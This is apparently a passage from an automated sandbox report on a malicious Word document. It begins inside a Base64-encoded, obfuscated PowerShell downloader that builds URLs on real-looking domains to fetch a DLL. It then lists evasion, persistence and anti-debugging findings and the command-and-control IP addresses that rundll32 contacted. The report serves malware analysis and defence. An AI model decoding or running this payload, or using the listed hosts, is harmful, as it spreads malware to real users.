ACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC			Jump to behavior

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_000007FF00270ED3 push E0000000h; ret	5_2_000007FF00270FF1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_000007FF0027100A push E0000000h; ret	5_2_000007FF00270FF1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00242D98 push 00242E25h; ret	7_2_00242E1D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00250020 push 00250058h; ret	7_2_00250050
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00244038 push 00244064h; ret	7_2_0024405C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021A0B2 push 0021A0E0h; ret	7_2_0021A0D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021A0B4 push 0021A0E0h; ret	7_2_0021A0D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021B274 push 0021B2CDh; ret	7_2_0021B2C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0022C34C push 0022C378h; ret	7_2_0022C370
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021E450 push ecx; mov dword ptr [esp], edx	7_2_0021E454
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00250498 push 002504EFh; ret	7_2_002504E7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002504F4 push 0025055Ch; ret	7_2_00250554
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002505B8 push 002505E4h; ret	7_2_002505DC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00250580 push 002505ACh; ret	7_2_002505A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0024B588 push 0024B5CAh; ret	7_2_0024B5C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002505F0 push 0025063Ch; ret	7_2_00250634
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00250654 push 00250680h; ret	7_2_00250678
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0025068C push 002506B8h; ret	7_2_002506B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021E696 push ecx; mov dword ptr [esp], edx	7_2_0021E69C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021E6F0 push ecx; mov dword ptr [esp], edx	7_2_0021E6F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002506C4 push 002506F0h; ret	7_2_002506E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021D6DC push 0021D751h; ret	7_2_0021D749
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00218748 push 00218774h; ret	7_2_0021876C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021E750 push ecx; mov dword ptr [esp], edx	7_2_0021E754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021D754 push 0021D7ADh; ret	7_2_0021D7A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002537A8 push 002537E0h; ret	7_2_002537D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00218798 push 002187C4h; ret	7_2_002187BC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002507E4 push 00250827h; ret	7_2_0025081F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00250834 push 00250860h; ret	7_2_00250858
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0025086C push 00250898h; ret	7_2_00250890
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00253848 push 00253874h; ret	7_2_0025386C

Persistence and Installation Behavior:

Creates processes via WMI

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Drops PE files

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Kaktksw\An6othh\N49I.dll

Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\Windows\SysWOW64\rundll32.exe

PE file moved: C:\Windows\SysWOW64\Kizmwn\teeko.fjq

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Kizmwn\teeko.fjq:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Ggqmed\gtlaa.wuq:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Yapklbuza\ogcvtegh.uyf:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Mwxqfujfxki\wrmqlfoubv.sew:Zone.Identifier read attributes \| delete	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Dropped PE file which has not been started: C:\Users\user\Kaktksw\An6othh\N49I.dll

Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2352

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: rundll32.exe, 00000008.00000002.2094600564.00000000007CD000.00000004.00000020.sdmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to read the PEB

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F1D4D mov eax, dword ptr fs:[00000030h]	7_2_001F1D4D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002912C1 mov eax, dword ptr fs:[00000030h]	7_2_002912C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00411D4D mov eax, dword ptr fs:[00000030h]	8_2_00411D4D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_007112C1 mov eax, dword ptr fs:[00000030h]	8_2_007112C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001812C1 mov eax, dword ptr fs:[00000030h]	9_2_001812C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A12C1 mov eax, dword ptr fs:[00000030h]	10_2_003A12C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003D12C1 mov eax, dword ptr fs:[00000030h]	11_2_003D12C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001F12C1 mov eax, dword ptr fs:[00000030h]	12_2_001F12C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00661D4D mov eax, dword ptr fs:[00000030h]	13_2_00661D4D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B12C1 mov eax, dword ptr fs:[00000030h]	13_2_001B12C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00411D4D mov eax, dword ptr fs:[00000030h]	14_2_00411D4D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001D12C1 mov eax, dword ptr fs:[00000030h]	14_2_001D12C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00171D4D mov eax, dword ptr fs:[00000030h]	15_2_00171D4D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_002B12C1 mov eax, dword ptr fs:[00000030h]	15_2_002B12C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00281D4D mov eax, dword ptr fs:[00000030h]	16_2_00281D4D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_001A12C1 mov eax, dword ptr fs:[00000030h]	16_2_001A12C1

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Memory protected: page write copy | page execute | page execute read | page execute and read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 217.160.169.110 144	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 51.255.203.164 144	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 185.183.16.47 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 84.232.229.24 80	Jump to behavior

Encrypted powershell cmdline option found

